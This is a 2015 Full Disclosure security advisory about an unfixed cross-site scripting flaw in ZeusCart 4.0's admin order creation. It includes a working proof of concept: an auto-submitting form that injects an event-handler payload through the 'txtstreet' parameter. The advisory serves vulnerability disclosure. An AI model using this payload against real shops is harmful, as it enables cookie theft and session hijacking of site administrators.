ZeusCart 4.0 - XSS - not fixed

["Curesec Research Team (CRT)" <crt () curesec com>]

ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team
1. Introduction

Affected Product:       ZeusCart 4.0    
Fixed in:               not fixed
Fixed Version Link:     n/a     
Vendor Contact:         support () zeuscart com 
Vulnerability Type:     XSS     
Remote Exploitable:     Yes     
Reported to vendor:     08/13/2015      
Disclosed to public:    09/14/2015      
Release mode:           Full Disclosure 
CVE:                    n/a     
Credits                 Tim Coen of Curesec GmbH        

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when
adding a new order. With this, it is possible to steal cookies or inject
JavaScript keyloggers.
2. Proof of Concept


        <form name="myform" method="post"
action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create";
>
            <input type="hidden" name="hidOrderTotal" value="400">
            <input type="hidden" name="discount" value="flat">
            <input type="hidden" name="selCustomer" value="1">
            <input type="hidden" name="payOption" value="8">
            <input type="hidden" name="txtname" value="Primary">
            <input type="hidden" name="txtstreet" value="foo autofocus
onfocus=alert(1); bar">
        </form>
        <script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015      Informed Vendor about Issue (no reply)
09/07/2015      Reminded Vendor of release date (no reply)
09/14/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/